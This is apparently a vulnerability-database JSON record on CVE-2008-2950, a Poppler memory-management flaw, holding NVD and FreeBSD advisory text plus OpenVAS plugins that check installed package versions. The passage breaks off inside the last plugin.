{"cve": [{"lastseen": "2018-10-12T11:33:47", "bulletinFamily": "NVD", "description": "The Page destructor in Page.cc in libpoppler in Poppler 0.8.4 and earlier deletes a pageWidgets object even if it is not initialized by a Page constructor, which allows remote attackers to execute arbitrary code via a crafted PDF document.", "modified": "2018-10-11T16:45:29", "published": "2008-07-07T19:41:00", "id": "CVE-2008-2950", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2950", "title": "CVE-2008-2950", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:33", "bulletinFamily": "unix", "description": "\nFelipe Andres Manzano reports:\n\nThe libpoppler pdf rendering library, can free\n\t uninitialized pointers, leading to arbitrary code\n\t execution. This vulnerability results from memory\n\t management bugs in the Page class constructor/destructor.\n\n", "modified": "2008-07-07T00:00:00", "published": "2008-07-07T00:00:00", "id": "BC20510F-4DD4-11DD-93E7-0211D880E350", "href": "https://vuxml.freebsd.org/freebsd/bc20510f-4dd4-11dd-93e7-0211d880e350.html", "title": "poppler -- uninitialized pointer", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-04-09T11:41:14", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830386", "id": "OPENVAS:1361412562310830386", "title": "Mandriva Update for poppler MDVSA-2008:146 (poppler)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for poppler MDVSA-2008:146 (poppler)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 
2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A memory management issue was found in libpoppler by Felipe Andres\n Manzano that could allow for the execution of arbitrary code with\n the privileges of the user running a poppler-based application,\n if they opened a specially crafted PDF file (CVE-2008-2950).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"poppler on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-07/msg00029.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830386\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: 
\"2008:146\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Mandriva Update for poppler MDVSA-2008:146 (poppler)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # 
Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:57:03", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830386", "id": "OPENVAS:830386", "title": "Mandriva Update for poppler MDVSA-2008:146 (poppler)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for poppler MDVSA-2008:146 (poppler)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or 
modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A memory management issue was found in libpoppler by Felipe Andres\n Manzano that could allow for the execution of arbitrary code with\n the privileges of the user running a poppler-based application,\n if they opened a specially crafted PDF file (CVE-2008-2950).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"poppler on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-07/msg00029.php\");\n script_id(830386);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2008:146\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Mandriva Update for poppler MDVSA-2008:146 (poppler)\");\n\n script_summary(\"Check for the 
Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-28T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61286", "id": "OPENVAS:61286", "title": "FreeBSD Ports: poppler", "type": "openvas", "sourceData": "#\n#VID bc20510f-4dd4-11dd-93e7-0211d880e350\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: poppler\n\nCVE-2008-2950\nThe Page destructor in Page.cc in libpoppler in Poppler 0.8.4 and\nearlier deletes a pageWidgets object even if it is not initialized by\na Page constructor, which allows remote attackers to execute arbitrary\ncode via a crafted PDF document.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://milw0rm.com/exploits/6032\nhttp://www.vuxml.org/freebsd/bc20510f-4dd4-11dd-93e7-0211d880e350.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(61286);\n script_version(\"$Revision: 4164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-28 09:03:16 +0200 (Wed, 28 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-2950\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: poppler\");\n\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"poppler\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.4_2\")<0) {\n txt += 'Package poppler version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200807-04.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61251", "id": "OPENVAS:61251", "title": "Gentoo Security Advisory GLSA 200807-04 (poppler)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Poppler is affected by a memory management issue, which could lead to the\nexecution of arbitrary code.\";\ntag_solution = \"All poppler users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/poppler-0.6.3-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200807-04\nhttp://bugs.gentoo.org/show_bug.cgi?id=229931\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200807-04.\";\n\n \n\nif(description)\n{\n script_id(61251);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2008-2950\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200807-04 (poppler)\");\n\n\n\n 